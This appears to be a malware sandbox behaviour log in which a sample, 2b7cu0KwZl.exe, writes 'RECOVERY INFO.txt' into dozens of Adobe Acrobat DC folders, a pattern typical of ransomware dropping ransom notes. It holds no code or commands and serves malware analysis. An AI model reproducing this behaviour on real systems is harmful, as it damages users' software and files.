Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
